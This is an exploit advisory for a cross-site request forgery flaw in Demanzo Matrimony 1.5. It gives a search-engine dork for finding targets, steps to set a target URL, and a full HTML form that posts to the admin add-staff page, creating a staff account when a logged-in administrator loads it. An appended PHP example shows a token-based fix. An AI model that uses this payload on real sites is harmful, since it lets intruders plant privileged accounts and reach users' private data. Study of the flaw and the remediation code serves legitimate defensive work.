Demanzo Matrimony 1.5 Cross Site Request Forgery

====================================================================================================================================
| # Title : Demanzo Matrimony v.1.5 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit) |
| # Vendor : https://demanzo.com/matrimony-site-development/ |
| # Dork : Powered by ITAcumens or “Powered by Demanzo” |
====================================================================================================================================

poc :

[+] Affected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking in Google or other search engine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link, save the changes and apply.

</div>
<form action="https://www.example/web/html/admin/add-staff.php" method="POST">
<div id="msg">
<div class="form-group ban_btm1 col-md-6 no_pad">
<label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>
<div class="col-md-8 frm_pd">
<input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">
</div>
</div>

<div class="form-group ban_btm1 col-md-6 no_pad">
<label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>
<div class="col-md-8 frm_pd">
<input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">
</div>
</div>

<div class="form-group ban_btm1 col-md-6 no_pad">
<label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>
<div class="col-md-8 frm_pd">
<input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">
</div>
</div>

<div class="form-group ban_btm1 col-md-6 no_pad">
<label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>
<div class="col-md-8 frm_pd">
<input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>
<input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>
</div>
</div>

<div class="form-group ban_btm1 col-md-12 no_pad">
<label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>
<div class="col-md-10 frm_pd">
<input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">
</div>
</div>

<div class="form-group ban_btm1 col-md-12 no_pad">
<label class="control-label col-md-2 frm_pd">Address <span class="red">*</span> : </label>
<div class="col-md-10 frm_pd">
<textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>
</div>
</div>

<!-- <div class="form-group ban_btm1 col-md-12 no_pad"> -->
<!-- <label class="control-label col-md-2 frm_pd">Access Level <span class="red">*</span> : </label> -->
<!-- <div class="col-md-10 frm_pd chk_box"> -->
<!-- <input id="access1" type="checkbox" checked /> <label for="access1" class="col-lg-3 col-md-5 col-sm-6">All</label> -->
<!-- <input id="access2" type="checkbox" /> <label for="access2" class="col-lg-4 col-md-7 col-sm-6">Manage Plan</label> -->
<!-- <input id="access3" type="checkbox" /> <label for="access3" class="col-lg-5 col-md-5 col-sm-6">Manage Kootam / Kulam</label> -->
<!-- <input id="access4" type="checkbox" /> <label for="access4" class="col-lg-3 col-md-7 col-sm-6">To Approve</label> -->
<!-- <input id="access5" type="checkbox" /> <label for="access5" class="col-lg-4 col-md-5 col-sm-6">Manage Success Stories</label> -->
<!-- <input id="access6" type="checkbox" /> <label for="access6" class="col-lg-5 col-md-7 col-sm-6">Manage Advertisement</label> -->
<!-- <input id="access7" type="checkbox" /> <label for="access7" class="col-lg-3 col-md-5 col-sm-6">Manage Staff</label> -->
<!-- <input id="access8" type="checkbox" /> <label for="access8" class="col-lg-4 col-md-7 col-sm-6">Manage Member</label> -->
<!-- <input id="access9" type="checkbox" /> <label for="access9" class="col-lg-5 col-md-5 col-sm-6">Manage City</label> -->
<!-- <input id="access10" type="checkbox" /> <label for="access10" class="col-lg-3 col-md-7 col-sm-6">Manage State</label> -->
<!-- <input id="access11" type="checkbox" /> <label for="access11" class="col-lg-4 col-md-5 col-sm-6">Manage Country</label> -->
<!-- <input id="access12" type="checkbox" /> <label for="access12" class="col-lg-5 col-md-7 col-sm-6">Manage Education</label> -->
<!-- <input id="access13" type="checkbox" /> <label for="access13" class="col-lg-3 col-md-5 col-sm-6">Reports</label> -->
<!-- <input id="access14" type="checkbox" /> <label for="access14" class="col-lg-4 col-md-7 col-sm-6">Ematch</label> -->
<!-- <input id="access15" type="checkbox" /> <label for="access15" class="col-lg-5 col-md-5 col-sm-6">Advanced Search</label> -->
<!-- <input id="access16" type="checkbox" /> <label for="access16" class="col-lg-3 col-md-7 col-sm-6">Group Mail</label> -->
<!-- <input id="access17" type="checkbox" /> <label for="access17" class="col-lg-4 col-md-5 col-sm-6">Featured Profiles</label> -->
<!-- <input id="access18" type="checkbox" /> <label for="access18" class="col-lg-5 col-md-7 col-sm-6">Upgrade / Renewal Membership</label> -->
<!-- <input id="access19" type="checkbox" /> <label for="access19" class="col-lg-3 col-md-5 col-sm-6">Accounts </label> -->
<!-- <input id="access20" type="checkbox" /> <label for="access20" class="col-lg-4 col-md-7 col-sm-6">Logo</label> -->
<!-- <input id="access21" type="checkbox" /> <label for="access21" class="col-lg-5 col-md-5 col-sm-6">Religion</label> -->
<!-- </div> -->
<!-- </div> -->

<!-- <div class="form-group ban_btm1 col-lg-7 col-md-12 no_pad"> -->
<!-- <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">IP Address Controls <span class="red">*</span> : </label> -->
<!-- <div class="col-lg-8 col-md-10 frm_pd chk_box"> -->
<!-- <input id="status1" type="checkbox" checked /> <label for="status1" class="col-md-4">All</label> -->
<!-- <input id="status2" type="checkbox" /> <label for="status2" class="col-md-8">192.168.10.156</label> -->
<!-- </div> -->
<!-- </div> -->

<div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">
<label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>
<div class="col-lg-8 col-md-10 frm_pd">
<input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>
<input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>
</div>
</div>

<div class="col-md-2 col-md-offset-5 col-sm-12">
<input type="submit" class="ctn_btn no_mt1" value="Add" name="add">
</div>

Greetings to :===================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|
==================================================================================================
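
The form above carries no value tied to the administrator's session, so a handler that accepts it cannot tell its own page from a foreign one. The following is an added example of the server-side fix, not code from the advisory or from the vendor: the function names, the `csrf_token` field and session key, and the handler layout are assumptions, and only the `add` submit field comes from the form above. It assumes PHP 7.3 or later served over HTTPS.

```php
<?php
// Added example: hypothetical hardening for a handler such as /admin/add-staff.php.
// The vendor's source is not shown on this page; all names here are assumptions.

// Keep the session cookie off cross-site requests (array form needs PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Strict']);
session_start();

// One unpredictable token per session, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted value is a string equal to the session token.
// The is_string() guard rejects array input such as csrf_token[]=x.
function csrf_valid($submitted): bool
{
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted); // constant-time compare
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add'])) {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The existing staff-creation logic runs only past this point.
}
?>
<form action="add-staff.php" method="POST">
    <!-- Hidden token that a page on another origin cannot read or guess -->
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
    <!-- original form fields unchanged -->
    <input type="submit" value="Add" name="add">
</form>
```

The token check is the primary control; `SameSite=Strict` is defence in depth for browsers that honour it.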
